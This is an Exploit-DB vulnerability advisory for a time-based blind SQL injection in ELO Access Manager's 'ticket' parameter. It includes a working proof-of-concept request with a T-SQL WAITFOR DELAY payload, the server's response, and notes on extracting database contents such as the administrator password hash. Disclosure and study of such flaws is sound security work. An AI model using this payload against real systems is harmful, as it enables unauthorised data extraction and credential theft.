Elektronischer Leitz-Ordner 10 – SQL Injection

  • Author: Jens Regel
    Date: 2018-07-10
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/44999/
  • # Title: Elektronischer Leitz-Ordner 10 - SQL Injection
    # Author: Jens Regel, Schneider & Wulf EDV-Beratung GmbH & Co. KG
    # Software: https://www.elo.com/en-de/
    # CVE: N/A
    # Affected Products:
    # ELOenterprise 10 (ELO Access Manager <= 10.17.120)
    # ELOenterprise 9 (ELO Access Manager <= 9.17.120)
    # ELOprofessional 10 (ELO Access Manager <= 10.17.120)
    # ELOprofessional 9 (ELO Access Manager <= 9.17.120)
    
    # Description: 
    # ELO is a commercial software product for managing documents and
    # electronic content. Storage and organization is similar to classic
    # paper-based document management. ELO belongs to the category of document
    # management (DMS) and enterprise content management systems (ECM). DMS
    # and ECM systems enable audit-proof archiving of documents and
    # information requiring storage.
    
    # We have discovered a time-based blind SQL injection vulnerability in the
    # ELO Access Manager (<= 9.17.120 and <= 10.17.120) component that makes
    # it possible to read all database content. The vulnerability exists in
    # the HTTP GET parameter "ticket" of the social feed API. The backend is
    # Microsoft SQL Server (note the T-SQL constructs in the proof of concept),
    # so a conditional WAITFOR DELAY turns every request into a one-bit timing
    # oracle: the server answers 401 either way, but only a true condition
    # delays the response. For example, we succeeded in reading the password
    # hash of the administrator user in the "userdata" table from the "eloam"
    # database one character at a time this way.
    
    # Proof of Concept:
    
    GET /wf-NAME/social/api/feed/aggregation/201803310000?ticket=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX' IF(UNICODE(SUBSTRING((SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)),CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 7 name FROM master..sysdatabases ORDER BY name) ORDER BY name),5,1))>104) WAITFOR DELAY '0:0:1'-- qvAV&after=1523013041889&lang=de&_dc=1523013101769 HTTP/1.1
    Accept-Encoding: gzip,deflate
    Connection: close
    Accept: */*
    Host: server:9090
    Referer: http://server:9090/wf-NAME/social/api/feed/aggregation/201803310000
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0
    
    HTTP/1.1 401 Unauthorized
    Server: Apache-Coyote/1.1
    Content-Type: application/json;charset=UTF-8
    Content-Length: 410
    Date: Fri, 06 Apr 2018 11:57:15 GMT
    Connection: close
    
    {"error":{"code":401,"message":"[TICKET:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\u0027 IF(UNICODE(SUBSTRING((SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)),CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 7 name FROM master..sysdatabases ORDER BY name) ORDER BY name),5,1))\u003e104) WAITFOR DELAY \u00270][ELOIX:2001]Sitzungskennung ungültig oder abgelaufen. Melden Sie sich neu an.[NO-DETAILS]"}}
    
    # The German error text means "session ID invalid or expired, please log in
    # again". The 401 is returned whether or not the injected IF fired; the
    # injected statement executes before the ticket is rejected, so the one
    # second delay in the response time is the only signal. The request above
    # asks whether the fifth character of the eighth database name (sorted
    # alphabetically) has a code point greater than 104 ('h').